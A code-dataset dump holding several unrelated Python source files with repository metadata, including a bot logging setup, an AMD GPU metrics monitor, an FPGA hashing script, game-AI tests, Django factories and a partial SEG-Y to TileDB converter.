jnxMbgSgwPPUpdConnSetRspRx=jnxMbgSgwPPUpdConnSetRspRx, jnxMbgSgwDelIndTunRespRx=jnxMbgSgwDelIndTunRespRx, jnxMbgSgwPPSuspNotifTx=jnxMbgSgwPPSuspNotifTx, jnxMbgSgwIfUpdConnSetRspRx=jnxMbgSgwIfUpdConnSetRspRx, jnxMbgSgwGtpV2ICsInvMsgFmtRx=jnxMbgSgwGtpV2ICsInvMsgFmtRx, jnxMbgSgwIfGtpV2ICsAPNAcsDenTx=jnxMbgSgwIfGtpV2ICsAPNAcsDenTx, jnxMbgSgwDelBrFlrIndTx=jnxMbgSgwDelBrFlrIndTx, jnxMbgSgwIfIndex=jnxMbgSgwIfIndex, jnxMbgSgwGtpV1T3RespTmrExpRx=jnxMbgSgwGtpV1T3RespTmrExpRx, jnxMbgSgwPPCreateSessRspTx=jnxMbgSgwPPCreateSessRspTx, jnxMbgSgwPPDelBrCmdTx=jnxMbgSgwPPDelBrCmdTx, jnxMbgSgwIfStopPagingIndTx=jnxMbgSgwIfStopPagingIndTx, jnxMbgSgwPPGtpV2ICsRelocFailRx=jnxMbgSgwPPGtpV2ICsRelocFailRx, jnxMbgSgwPPGtpV2ICsInvMsgFmtTx=jnxMbgSgwPPGtpV2ICsInvMsgFmtTx, jnxMbgSgwIfGtpV2ICsDenINRatTx=jnxMbgSgwIfGtpV2ICsDenINRatTx, jnxMbgSgwPPGtpV2ICsISRDeactRx=jnxMbgSgwPPGtpV2ICsISRDeactRx, jnxMbgSgwPPBrResCmdRx=jnxMbgSgwPPBrResCmdRx, jnxMbgSgwPPGtpV2ICsNoResTx=jnxMbgSgwPPGtpV2ICsNoResTx, jnxMbgSgwPPGtpV2ICsAllDynAdOcRx=jnxMbgSgwPPGtpV2ICsAllDynAdOcRx, jnxMbgSgwIfGtpV2ICsDtForNtSupTx=jnxMbgSgwIfGtpV2ICsDtForNtSupTx, jnxMbgSgwIfV2NumMsgTx=jnxMbgSgwIfV2NumMsgTx, jnxMbgSgwIfGtpV2ICsInvLenTx=jnxMbgSgwIfGtpV2ICsInvLenTx, jnxMbgSgwDlDataNotiFlrIndTx=jnxMbgSgwDlDataNotiFlrIndTx, jnxMbgSgwIfGtpV2ICsRPrNtRspTx=jnxMbgSgwIfGtpV2ICsRPrNtRspTx, jnxMbgSgwGtpV2ICsDeniedINRatTx=jnxMbgSgwGtpV2ICsDeniedINRatTx, jnxMbgSgwGtpV2ICsProtoNtSupRx=jnxMbgSgwGtpV2ICsProtoNtSupRx, jnxMbgSgwPPModBrFlrIndRx=jnxMbgSgwPPModBrFlrIndRx, jnxMbgSgwV2VerNotSupRx=jnxMbgSgwV2VerNotSupRx, jnxMbgSgwPPGtpV1EndMarkerRx=jnxMbgSgwPPGtpV1EndMarkerRx, jnxMbgSgwGtpV2ICsISRDeactTx=jnxMbgSgwGtpV2ICsISRDeactTx, jnxMbgSgwGtpV2ICsServDeniedRx=jnxMbgSgwGtpV2ICsServDeniedRx, jnxMbgSgwIfDlDataNotiFlrIndTx=jnxMbgSgwIfDlDataNotiFlrIndTx, jnxMbgSgwCrIndTunReqTx=jnxMbgSgwCrIndTunReqTx, jnxMbgSgwGtpV2ICsUserAUTHFlTx=jnxMbgSgwGtpV2ICsUserAUTHFlTx, jnxMbgSgwPPV2NumBytesRx=jnxMbgSgwPPV2NumBytesRx, jnxMbgSgwS4PiggybackMsgRx=jnxMbgSgwS4PiggybackMsgRx, jnxMbgSgwIfDlDataAckTx=jnxMbgSgwIfDlDataAckTx, jnxMbgSgwIfGtpV2ICsGREKeyNtFdRx=jnxMbgSgwIfGtpV2ICsGREKeyNtFdRx, jnxMbgSgwGtpV2ICsISRDeactRx=jnxMbgSgwGtpV2ICsISRDeactRx, jnxMbgSgwIfDelSessReqTx=jnxMbgSgwIfDelSessReqTx, jnxMbgSgwIfRelAcsBrReqTx=jnxMbgSgwIfRelAcsBrReqTx, jnxMbgSgwDelSessRspRx=jnxMbgSgwDelSessRspRx, jnxMbgSgwPPModBrRspTx=jnxMbgSgwPPModBrRspTx, jnxMbgSgwIfV2EchoRespRx=jnxMbgSgwIfV2EchoRespRx, jnxMbgSgwBrResCmdRx=jnxMbgSgwBrResCmdRx, jnxMbgSgwPPGtpV2ICsAPNResTIncTx=jnxMbgSgwPPGtpV2ICsAPNResTIncTx, jnxMbgSgwPPGtpV2ICsInvTotLenRx=jnxMbgSgwPPGtpV2ICsInvTotLenRx, jnxMbgSgwGtpV2ICsUnPgUESusRx=jnxMbgSgwGtpV2ICsUnPgUESusRx, jnxMbgSgwIfGtpV2ICsOptIEIncorTx=jnxMbgSgwIfGtpV2ICsOptIEIncorTx, jnxMbgSgwGtpV2ICsCmpDetTx=jnxMbgSgwGtpV2ICsCmpDetTx, jnxMbgSgwModBrFlrIndRx=jnxMbgSgwModBrFlrIndRx, jnxMbgSgwIfGtpV2ICsRMValRcvTx=jnxMbgSgwIfGtpV2ICsRMValRcvTx, jnxMbgSgwGtpCPerPeerStatsTable=jnxMbgSgwGtpCPerPeerStatsTable, jnxMbgSgwGtpInterfaceType=jnxMbgSgwGtpInterfaceType, jnxMbgSgwPPGtpV2ICsServNotSupTx=jnxMbgSgwPPGtpV2ICsServNotSupTx, jnxMbgSgwPPBrResFlrIndRx=jnxMbgSgwPPBrResFlrIndRx, jnxMbgSgwIfGtpV2ICsCondIEMsRx=jnxMbgSgwIfGtpV2ICsCondIEMsRx, jnxMbgSgwIfGtpV2ICsAPNResTIncTx=jnxMbgSgwIfGtpV2ICsAPNResTIncTx, jnxMbgSgwIfGtpV2ICsISRDeactTx=jnxMbgSgwIfGtpV2ICsISRDeactTx, jnxMbgSgwUpdBrReqRx=jnxMbgSgwUpdBrReqRx, jnxMbgSgwV2EchoRespRx=jnxMbgSgwV2EchoRespRx, jnxMbgSgwIfGtpV2ICsUnabPageUETx=jnxMbgSgwIfGtpV2ICsUnabPageUETx, jnxMbgSgwV2NumBytesTx=jnxMbgSgwV2NumBytesTx, jnxMbgSgwIfBrResFlrIndTx=jnxMbgSgwIfBrResFlrIndTx, jnxMbgSgwPPCreateSessRspRx=jnxMbgSgwPPCreateSessRspRx, jnxMbgSgwPPGtpV2ICsReqAcceptTx=jnxMbgSgwPPGtpV2ICsReqAcceptTx, jnxMbgSgwIfGtpV2ICsVerNotSuppRx=jnxMbgSgwIfGtpV2ICsVerNotSuppRx, jnxMbgSgwPPGtpV2ICsReqRejTx=jnxMbgSgwPPGtpV2ICsReqRejTx, jnxMbgSgwIfT3RespTmrExpRx=jnxMbgSgwIfT3RespTmrExpRx, jnxMbgSgwPPUpdConnSetRspTx=jnxMbgSgwPPUpdConnSetRspTx, jnxMbgSgwPPGtpRmtAddr=jnxMbgSgwPPGtpRmtAddr, jnxMbgSgwGtpGlbStatsEntry=jnxMbgSgwGtpGlbStatsEntry, jnxMbgSgwGtpV2ICsEIFRNCEnRx=jnxMbgSgwGtpV2ICsEIFRNCEnRx, jnxMbgSgwIfCrIndTunRespRx=jnxMbgSgwIfCrIndTunRespRx, jnxMbgSgwGtpV2ICsRPrNtRspRx=jnxMbgSgwGtpV2ICsRPrNtRspRx, jnxMbgSgwPPGtpRtgInst=jnxMbgSgwPPGtpRtgInst)
| 130.12168 | 14,121 | 0.801753 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 55,361 | 0.205435 |
5e2c57a108833725810c97a24dfaf30c42381529 | 2,074 | py | Python | bot/cogs/utils/logging.py | Kobu/MasarykBOT | 9a6b6a026b4f39afaca5ab509c90f6da09e169a0 | [
"MIT"
] | 13 | 2019-09-14T16:51:35.000Z | 2021-03-03T22:20:44.000Z | bot/cogs/utils/logging.py | Kobu/MasarykBOT | 9a6b6a026b4f39afaca5ab509c90f6da09e169a0 | [
"MIT"
] | 15 | 2019-09-29T19:25:31.000Z | 2022-02-13T16:40:45.000Z | bot/cogs/utils/logging.py | Kobu/MasarykBOT | 9a6b6a026b4f39afaca5ab509c90f6da09e169a0 | [
"MIT"
] | 15 | 2019-09-18T10:50:59.000Z | 2022-02-11T20:55:19.000Z | import logging
import os
from logging import FileHandler, Formatter
from logging.handlers import TimedRotatingFileHandler
from pathlib import Path
from rich.logging import RichHandler
def my_namer(default_name):
# This will be called when doing the log rotation
# default_name is the default filename that would be assigned, e.g. Rotate_Test.txt.YYYY-MM-DD
# Do any manipulations to that name here, for example this changes the name to Rotate_Test.YYYY-MM-DD.txt
base_filename, _, ext, date = default_name.split(".")
return f"{base_filename}.{date}.{ext}"
def setup_logging():
"""
sets up custom logging into self.log variable
set format to
[2019-09-29 18:51:04] [INFO ] core.logger: Begining backup
"""
logging.getLogger('discord').setLevel(logging.WARNING)
logging.getLogger('discord.http').setLevel(logging.WARNING)
logging.getLogger("asyncio").setLevel(logging.INFO)
log = logging.getLogger()
shell_handler = RichHandler()
filename = Path("logs", __import__("datetime").datetime.now().strftime('bot.%Y-%m-%d.log'))
os.makedirs(os.path.dirname(filename), exist_ok=True)
all_file_handler = TimedRotatingFileHandler(filename, when='midnight')
all_file_handler.namer = my_namer
filename = Path("logs", "warn.log")
os.makedirs(os.path.dirname(filename), exist_ok=True)
warn_file_handler = FileHandler(filename, mode='a')
log.setLevel(logging.DEBUG)
shell_handler.setLevel(logging.INFO)
all_file_handler.setLevel(logging.DEBUG)
warn_file_handler.setLevel(logging.WARNING)
fmt_date = '%Y-%m-%d %H:%M:%S'
fmt_shell = '{message}'
fmt_file = '{asctime} | {levelname:<7} | {filename:>20}:{lineno:<4} | {message}'
shell_handler.setFormatter(Formatter(fmt_shell, fmt_date, style='{'))
all_file_handler.setFormatter(Formatter(fmt_file, fmt_date, style='{'))
warn_file_handler.setFormatter(Formatter(fmt_file, fmt_date, style='{'))
log.addHandler(shell_handler)
log.addHandler(all_file_handler)
log.addHandler(warn_file_handler)
| 35.758621 | 109 | 0.72324 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 630 | 0.303761 |
5e2e4d1334a3040d22f87965b228ed511a22030b | 3,018 | py | Python | amdtemp/amdtemp.py | micaelbergeron/amdtemp | 8bea1ae19f0837b105f83d7c9e107491f82ea094 | [
"MIT"
] | null | null | null | amdtemp/amdtemp.py | micaelbergeron/amdtemp | 8bea1ae19f0837b105f83d7c9e107491f82ea094 | [
"MIT"
] | null | null | null | amdtemp/amdtemp.py | micaelbergeron/amdtemp | 8bea1ae19f0837b105f83d7c9e107491f82ea094 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import os
import sys
import anyconfig
import re
import time
import importlib
import pdb
from select import poll, POLLIN
from statsd import StatsClient
def import_class(klass):
(module, klass) = klass.rsplit('.', 1)
module = importlib.import_module(module)
return getattr(module, klass)
sample_cfg = """
verbose=false
[statsd]
host="127.0.0.1"
port=8127
prefix="amdtemp.gpu"
[metrics.card0.temp]
path="/sys/class/drm/card0/device/hwmon/hwmon2/temp1_input"
[metrics.card0.pwm]
path="/sys/class/drm/card0/device/hwmon/hwmon2/pwm1"
[metrics.card0.memory]
path="/sys/class/drm/card0/device/pp_dpm_mclk"
parser="amdtemp.parsers.RegexParser"
[metrics.card0.memory.parser_options]
regex='(?P<power_state>\d):\s(?P<current_clck>\d+)[KMG]?hz\s\*'
[metrics.card0.core]
path="/sys/class/drm/card0/device/pp_dpm_sclk"
parser="amdtemp.parsers.RegexParser"
[metrics.card0.core.parser_options]
regex='(?P<power_state>\d):\s(?P<current_clck>\d+)[KMG]?hz\s\*'
"""
VERBOSE=False
class Metric:
def __init__(self, name, path, parser="amdtemp.parsers.IntParser", parser_options={}):
self.name = name
self.path = path
self.parser = import_class(parser)(name, **parser_options)
def poll(self):
with open(self.path, "r") as f:
raw = f.read()
if VERBOSE: print("Raw input (%s): %s" % (self.name, raw))
return self.parser.parse(raw)
def __str__(self):
return "Metric (%s), located at %s." % (name, path)
def record(client, fields):
if (VERBOSE):
[print("%s: %d" % (metric, value)) for metric, value in fields.items()]
for metric, value in fields.items():
client.gauge(metric, value)
def monitor(config):
statsd_client = StatsClient(**config['statsd'])
sources = get_sources_list(config)
while(True):
with statsd_client.pipeline() as batch:
for metrics in sources.values():
if VERBOSE: print("Recording...")
for m in metrics:
fields = m.poll()
if VERBOSE: print(fields)
record(batch, fields)
time.sleep(1)
def get_sources_list(config):
sources = dict()
for source, metric in config['metrics'].items():
prefix = lambda name: '.'.join((source, name))
sources[source] = [Metric(prefix(metric), **config) for metric, config in metric.items()]
return sources
usage = """
AMDTemp
This program uses the amdgpu sysfs interface to collect gpu information and send
over a statsd server.
Usage: amdtemp <configfile>
A sample config will be output when called without arguments.
"""
def main():
if len(sys.argv) == 1:
print(sample_cfg)
exit(0)
if re.match(r"(-h|--help|--usage)", sys.argv[1]):
print(usage)
exit(1)
config = anyconfig.load(sys.argv[1])
VERBOSE = config.get('verbose', False)
if (VERBOSE): print(config)
# import pdb; pdb.set_trace()
monitor(config)
| 25.576271 | 97 | 0.643804 | 506 | 0.167661 | 0 | 0 | 0 | 0 | 0 | 0 | 1,068 | 0.353877 |
5e2e945dd5aa5dbaa28763805003a91fd6eda97e | 5,523 | py | Python | keccak256hash_pcie.py | shahbaazlokh/Picoevb_Keccak256hash_Pcie_ipi | e813ae8f706b9e1f1a44edef5c0fe18677a39820 | [
"MIT"
] | 1 | 2019-12-26T17:30:35.000Z | 2019-12-26T17:30:35.000Z | keccak256hash_pcie.py | shahbaazlokh/Picoevb_Keccak256hash_Pcie_ipi | e813ae8f706b9e1f1a44edef5c0fe18677a39820 | [
"MIT"
] | null | null | null | keccak256hash_pcie.py | shahbaazlokh/Picoevb_Keccak256hash_Pcie_ipi | e813ae8f706b9e1f1a44edef5c0fe18677a39820 | [
"MIT"
] | 1 | 2021-03-27T22:02:50.000Z | 2021-03-27T22:02:50.000Z |
#!/usr/bin/env python3
import os
import time
import binascii
import codecs
def swap_order(d, wsz=16, gsz=2 ):
return "".join(["".join([m[i:i+gsz] for i in range(wsz-gsz,-gsz,-gsz)]) for m in [d[i:i+wsz] for i in range(0,len(d),wsz)]])
expected_genesis_hash = "00000009c4e61bee0e8d6236f847bb1dd23f4c61ca5240b74852184c9bf98c30"
blockheader1 = "020000005bf0e2f283edac06ea087a9324dc9bd865c79b175658849bd83900000000000085246da7e6e530d276d5f8e0d4222cb8938f7af0e9d6678ec08ff133812f4b7251e8e35cec16471af51dd61c"
expected_hash1 = "00000000623c9e9d39c1fb7ab7290b3014b6348d10c54aa6ab6fc408385dfaa6"
def read_fpga_temprature():
#XADC IP is connected to xdma pcie IP via axi4-lite interface on base-addr 0x40000000
# open port and then read from dedicated register
fd = os.open("/dev/xdma0_user", os.O_RDWR)
temp = os.pread(fd,32,0x0000 + 0x200)[::-1] # read temerature out from temperature register
temp_reg = int.from_bytes(temp, "big")
t = ((int(temp_reg)/65536.0)/0.00198421639) - 273.15
# print("--------------------------------------")
print ("Temperature : {} Celsius".format(t))
# print("--------------------------------------")
os.close(fd)
# Read FPGA MAX Temprature
def read_fpga_maxtemprature():
#XADC IP is connected to xdma pcie IP via axi4-lite interface on base-addr 0x40000000
# open port and then read from dedicated register
fd = os.open("/dev/xdma0_user", os.O_RDWR)
temp = os.pread(fd,32,0x0000 + 0x280)[::-1] # read maxtemerature out from temperature register
temp_reg = int.from_bytes(temp, "big")
t = ((int(temp_reg)/65536.0)/0.00198421639) - 273.15
# print("--------------------------------------")
print ("Temperature Max: {} Celsius".format(t))
# print("--------------------------------------")
os.close(fd)
# Read vccint voltage
def read_fpga_VCCINT():
#XADC IP is connected to xdma pcie IP via axi4-lite interface on base-addr 0x40000000
# open port and then read from dedicated register
fd = os.open("/dev/xdma0_user", os.O_RDWR)
vint_temp = os.pread(fd,32,0x0000 + 0x204)[::-1] # read voltage out from vccint register
volt_int = int.from_bytes(vint_temp, "big")
vint = ((volt_int) * 3.0)/65536.0
# print("--------------------------------------")
print ("VCCINT : {0:.04f} V".format(vint))
# print("--------------------------------------")
os.close(fd)
# # Read max vccint voltage
# def read_fpga_maxVCCINT():
# #XADC IP is connected to xdma pcie IP via axi4-lite interface on base-addr 0x40000000
# # open port and then read from dedicated register
# fd = os.open("/dev/xdma0_user", os.O_RDWR)
# vint_temp = os.pread(fd,32,0x0000 + 0x284)[::-1] # read max voltage out from vccint register
# volt_int = int.from_bytes(vint_temp, "big")
# print(volt_int)
# vint = ((volt_int) * 3.0)/65536.0
# print("--------------------------------------")
# print ("VCCINT max: {0:.04f} V".format(vint))
# print("--------------------------------------")
# os.close(fd)
# Read vccaux , read fpga auxillary volatges
def read_fpga_VCCAUX():
#XADC IP is connected to xdma pcie IP via axi4-lite interface on base-addr 0x40000000
# open port and then read from dedicated register
fd = os.open("/dev/xdma0_user", os.O_RDWR)
vaux_temp = os.pread(fd,32,0x0000 + 0x208)[::-1] # read voltage out from vccaux register
volt_int = int.from_bytes(vaux_temp, "big")
vint = ((volt_int) * 3.0)/65536.0
# print("--------------------------------------")
print ("VCCAUX : {0:.04f} V".format(vint))
# print("--------------------------------------")
os.close(fd)
def read_fpga_VCCBRAM():
#XADC IP is connected to xdma pcie IP via axi4-lite interface on base-addr 0x40000000
# open port and then read from dedicated register
fd = os.open("/dev/xdma0_user", os.O_RDWR)
vbram_temp = os.pread(fd,32,0x0000 + 0x218)[::-1] # read voltage out from vccbram register
volt_int = int.from_bytes(vbram_temp, "big")
vint = ((volt_int) * 3.0)/65536.0
# print("--------------------------------------")
print ("VCCBRAM : {0:.04f} V".format(vint))
# print("--------------------------------------")
os.close(fd)
def hash_genesis_block():
blockheader = ("02000000" +
"a4051e368bfa0191e6c747507dd0fdb03da1a0a54ed14829810b97c6ac070000" +
"e932b0f6b8da85ccc464d9d5066d01d904fb05ae8d1ddad7095b9148e3f08ba6" +
"bcfb6459" +
"f0ff0f1e" +
"3682bb08")
print("txdata:%s" %blockheader)
blockheader_bin = binascii.unhexlify(swap_order(blockheader))
tx_data = blockheader_bin
# Open files
fd_h2c = os.open("/dev/xdma/card0/h2c0", os.O_WRONLY)
fd_c2h = os.open("/dev/xdma/card0/c2h0", os.O_RDONLY)
start_time = time.time()
# Send to FPGA
os.pwrite(fd_h2c, tx_data, 0)
# Receive from FPGA
rx_data = os.pread(fd_c2h, 32, 0)
end_time = time.time()
delay = end_time -start_time
blockheder_rx = codecs.encode(rx_data,'hex').decode('ascii')
print("rxdata:%s" %swap_order(blockheder_rx)[0:64])
print("Time elapsed:%f microsec" %(delay*1000000))
os.close(fd_h2c)
os.close(fd_c2h)
##############################################
def main():
hash_genesis_block()
read_fpga_temprature()
read_fpga_maxtemprature()
read_fpga_VCCINT()
read_fpga_VCCAUX()
read_fpga_VCCBRAM()
##############################################
if __name__ == '__main__':
main()
| 40.313869 | 177 | 0.60927 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,081 | 0.557849 |
5e3240efc103a1b22b47cef9a9d5b727a615ddff | 3,311 | py | Python | tests/test_policy.py | forkedOrg/RocAlphaGo | a727763ea0b73ac984d13f81329d99c9a8a620c0 | [
"MIT"
] | null | null | null | tests/test_policy.py | forkedOrg/RocAlphaGo | a727763ea0b73ac984d13f81329d99c9a8a620c0 | [
"MIT"
] | null | null | null | tests/test_policy.py | forkedOrg/RocAlphaGo | a727763ea0b73ac984d13f81329d99c9a8a620c0 | [
"MIT"
] | null | null | null | from AlphaGo.models.policy import CNNPolicy
from AlphaGo import go
from AlphaGo.go import GameState
from AlphaGo.ai import GreedyPolicyPlayer, ProbabilisticPolicyPlayer
import numpy as np
import unittest
import os
class TestCNNPolicy(unittest.TestCase):
def test_default_policy(self):
policy = CNNPolicy(["board", "liberties", "sensibleness", "capture_size"])
policy.eval_state(GameState())
# just hope nothing breaks
def test_batch_eval_state(self):
policy = CNNPolicy(["board", "liberties", "sensibleness", "capture_size"])
results = policy.batch_eval_state([GameState(), GameState()])
self.assertEqual(len(results), 2) # one result per GameState
self.assertEqual(len(results[0]), 361) # each one has 361 (move,prob) pairs
def test_output_size(self):
policy19 = CNNPolicy(["board", "liberties", "sensibleness", "capture_size"], board=19)
output = policy19.forward(policy19.preprocessor.state_to_tensor(GameState(19)))
self.assertEqual(output.shape, (1, 19 * 19))
policy13 = CNNPolicy(["board", "liberties", "sensibleness", "capture_size"], board=13)
output = policy13.forward(policy13.preprocessor.state_to_tensor(GameState(13)))
self.assertEqual(output.shape, (1, 13 * 13))
def test_save_load(self):
policy = CNNPolicy(["board", "liberties", "sensibleness", "capture_size"])
model_file = 'TESTPOLICY.json'
weights_file = 'TESTWEIGHTS.h5'
model_file2 = 'TESTPOLICY2.json'
weights_file2 = 'TESTWEIGHTS2.h5'
# test saving model/weights separately
policy.save_model(model_file)
policy.model.save_weights(weights_file)
# test saving them together
policy.save_model(model_file2, weights_file2)
copypolicy = CNNPolicy.load_model(model_file)
copypolicy.model.load_weights(weights_file)
copypolicy2 = CNNPolicy.load_model(model_file2)
for w1, w2 in zip(copypolicy.model.get_weights(), copypolicy2.model.get_weights()):
self.assertTrue(np.all(w1 == w2))
os.remove(model_file)
os.remove(weights_file)
os.remove(model_file2)
os.remove(weights_file2)
class TestPlayers(unittest.TestCase):
def test_greedy_player(self):
gs = GameState()
policy = CNNPolicy(["board", "ones", "turns_since"])
player = GreedyPolicyPlayer(policy)
for i in range(20):
move = player.get_move(gs)
self.assertIsNotNone(move)
gs.do_move(move)
def test_probabilistic_player(self):
gs = GameState()
policy = CNNPolicy(["board", "ones", "turns_since"])
player = ProbabilisticPolicyPlayer(policy)
for i in range(20):
move = player.get_move(gs)
self.assertIsNotNone(move)
gs.do_move(move)
def test_sensible_probabilistic(self):
gs = GameState()
policy = CNNPolicy(["board", "ones", "turns_since"])
player = ProbabilisticPolicyPlayer(policy)
empty = (10, 10)
for x in range(19):
for y in range(19):
if (x, y) != empty:
gs.do_move((x, y), go.BLACK)
gs.current_player = go.BLACK
self.assertIsNone(player.get_move(gs))
def test_sensible_greedy(self):
gs = GameState()
policy = CNNPolicy(["board", "ones", "turns_since"])
player = GreedyPolicyPlayer(policy)
empty = (10, 10)
for x in range(19):
for y in range(19):
if (x, y) != empty:
gs.do_move((x, y), go.BLACK)
gs.current_player = go.BLACK
self.assertIsNone(player.get_move(gs))
if __name__ == '__main__':
unittest.main()
| 30.943925 | 88 | 0.725461 | 3,045 | 0.919662 | 0 | 0 | 0 | 0 | 0 | 0 | 565 | 0.170643 |
5e3257003e9364f1ddaf4c5be9cb5b8665d4201c | 1,840 | py | Python | conference/factories.py | mattaustin/django-conference | 9606724aaf2351e78269fabc8c81c0898e727635 | [
"Apache-2.0"
] | 1 | 2017-06-30T07:32:07.000Z | 2017-06-30T07:32:07.000Z | conference/factories.py | mattaustin/django-conference | 9606724aaf2351e78269fabc8c81c0898e727635 | [
"Apache-2.0"
] | null | null | null | conference/factories.py | mattaustin/django-conference | 9606724aaf2351e78269fabc8c81c0898e727635 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Copyright 2016 Matt Austin
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, unicode_literals
from django.utils import timezone
try:
import factory
except ImportError as e:
raise ImportError('The package "factory-boy" is required.')
else:
from factory import fuzzy
class ConferenceFactory(factory.django.DjangoModelFactory):
name = factory.Sequence(lambda n: 'Conference {}'.format(n))
slug = factory.Sequence(lambda n: 'conference-{}'.format(n))
class Meta(object):
model = 'conference.Conference'
class TimeSlotFactory(factory.django.DjangoModelFactory):
conference = factory.SubFactory('conference.factories.ConferenceFactory')
name = factory.Sequence(lambda n: 'Time Slot {}'.format(n))
start_at = fuzzy.FuzzyDateTime(
timezone.pytz.timezone('UTC').localize(timezone.datetime(2000, 1, 1)),
timezone.pytz.timezone('UTC').localize(timezone.datetime(2020, 1, 1)))
end_at = factory.LazyAttribute(
lambda o: o.start_at + timezone.timedelta(hours=1))
class Meta(object):
model = 'conference.TimeSlot'
class VenueFactory(factory.django.DjangoModelFactory):
name = factory.Sequence(lambda n: 'Venue {}'.format(n))
class Meta(object):
model = 'conference.Venue'
| 29.677419 | 78 | 0.721196 | 987 | 0.536413 | 0 | 0 | 0 | 0 | 0 | 0 | 792 | 0.430435 |
5e354afb63b174f5f617ab1a12d24daceb3e23d7 | 1,879 | py | Python | anchore_engine/db/db_users.py | bjwschaap/anchore-engine | 0aba1d12d79f63c5919ad301cecc5bd5cc09325a | [
"Apache-2.0"
] | null | null | null | anchore_engine/db/db_users.py | bjwschaap/anchore-engine | 0aba1d12d79f63c5919ad301cecc5bd5cc09325a | [
"Apache-2.0"
] | null | null | null | anchore_engine/db/db_users.py | bjwschaap/anchore-engine | 0aba1d12d79f63c5919ad301cecc5bd5cc09325a | [
"Apache-2.0"
] | null | null | null | import time
from anchore_engine import db
from anchore_engine.db import User
def add(userId, password, inobj, session=None):
if not session:
session = db.Session()
#our_result = session.query(User).filter_by(userId=userId, password=password).first()
our_result = session.query(User).filter_by(userId=userId).first()
if not our_result:
our_result = User(userId=userId, password=password)
if 'created_at' not in inobj:
inobj['created_at'] = int(time.time())
our_result.update(inobj)
session.add(our_result)
else:
inobj['password'] = password
our_result.update(inobj)
return(True)
def get_all(session=None):
if not session:
session = db.Session()
ret = []
our_results = session.query(User).filter_by()
for result in our_results:
obj = {}
obj.update(dict((key,value) for key, value in vars(result).items() if not key.startswith('_')))
ret.append(obj)
return(ret)
def get(userId, session=None):
if not session:
session = db.Session()
ret = {}
result = session.query(User).filter_by(userId=userId).first()
if result:
obj = dict((key,value) for key, value in vars(result).items() if not key.startswith('_'))
ret = obj
return(ret)
def update(userId, password, inobj, session=None):
return(add(userId, password, inobj, session=session))
def delete(userId, session=None):
if not session:
session = db.Session()
ret = False
result = session.query(User).filter_by(userId=userId).first()
if result:
session.delete(result)
ret = True
# try:
# session.commit()
# ret = True
# except Exception as err:
# raise err
# finally:
# session.rollback()
return(ret)
| 23.4875 | 103 | 0.610963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 293 | 0.155934 |
5e359e3a1d5de976c3e6e2ada1244b9cf4a25c97 | 10,116 | py | Python | tiledb/segy/convert.py | TileDB-Inc/tilesegy | d7a7703eea62dd27bcc1444d932bd4efaa50293c | [
"MIT"
] | null | null | null | tiledb/segy/convert.py | TileDB-Inc/tilesegy | d7a7703eea62dd27bcc1444d932bd4efaa50293c | [
"MIT"
] | 3 | 2020-12-21T15:52:03.000Z | 2021-01-15T11:48:21.000Z | tiledb/segy/convert.py | TileDB-Inc/tilesegy | d7a7703eea62dd27bcc1444d932bd4efaa50293c | [
"MIT"
] | null | null | null | import copy
from abc import ABC, abstractmethod
from collections import namedtuple
from contextlib import contextmanager
from pathlib import PurePath
from typing import Any, Iterable, Iterator, Optional, Union, cast
import numpy as np
import segyio
import segyio.tools
from cached_property import cached_property
from urlpath import URL
import tiledb
TypedTraceField = namedtuple("TypedTraceField", ["name", "enum", "dtype"])
def iter_typed_trace_fields() -> Iterator[TypedTraceField]:
all_fields = segyio.TraceField.enums()
include_names = set(map(str, segyio.field.Field._tr_keys))
size2dtype = {2: np.dtype(np.int16), 4: np.dtype(np.int32)}
for f, f2 in zip(all_fields, all_fields[1:]):
name = str(f)
if name in include_names:
yield TypedTraceField(name, f, size2dtype[int(f2) - int(f)])
TRACE_FIELDS = tuple(iter_typed_trace_fields())
TRACE_FIELD_ENUMS = tuple(int(f.enum) for f in TRACE_FIELDS)
TRACE_FIELD_NAMES = tuple(f.name for f in TRACE_FIELDS)
TRACE_FIELD_DTYPES = tuple(f.dtype for f in TRACE_FIELDS)
TRACE_FIELDS_SIZE = sum(dtype.itemsize for dtype in TRACE_FIELD_DTYPES)
TRACE_FIELD_FILTERS = (
tiledb.BitWidthReductionFilter(),
tiledb.ByteShuffleFilter(),
tiledb.LZ4Filter(),
)
class ExtendedSegyFile(segyio.SegyFile):
@cached_property
def trace_size(self) -> int:
return len(self._samples) * int(self._dtype.itemsize)
@cached_property
def fast_headerline(self) -> segyio.line.HeaderLine:
return self._header.iline if self.is_inline else self._header.xline
@cached_property
def fast_lines(self) -> np.ndarray:
return self._ilines if self.is_inline else self._xlines
@cached_property
def slow_lines(self) -> np.ndarray:
return self._xlines if self.is_inline else self._ilines
@cached_property
def is_inline(self) -> bool:
assert not self.unstructured
return bool(self.sorting == segyio.TraceSortingFormat.INLINE_SORTING)
class SegyFileConverter(ABC):
def __new__(cls, segy_file: segyio.SegyFile, **kwargs: Any) -> "SegyFileConverter":
if cls is SegyFileConverter:
if segy_file.unstructured:
cls = UnstructuredSegyFileConverter
else:
cls = StructuredSegyFileConverter
return cast(SegyFileConverter, super().__new__(cls))
def __init__(
self,
segy_file: segyio.SegyFile,
*,
tile_size: int,
config: Optional[tiledb.Config] = None,
):
if not isinstance(segy_file, ExtendedSegyFile):
segy_file = copy.copy(segy_file)
segy_file.__class__ = ExtendedSegyFile
self.segy_file = segy_file
self.tile_size = tile_size
self.config = config
def to_tiledb(self, uri: Union[str, PurePath]) -> None:
uri = URL(uri) if not isinstance(uri, PurePath) else uri
if tiledb.object_type(str(uri)) != "group":
tiledb.group_create(str(uri))
headers_uri = str(uri / "headers")
if tiledb.object_type(headers_uri) != "array":
dims = self._get_dims(TRACE_FIELDS_SIZE)
header_schema = tiledb.ArraySchema(
domain=tiledb.Domain(*dims),
sparse=False,
attrs=[
tiledb.Attr(f.name, f.dtype, filters=TRACE_FIELD_FILTERS)
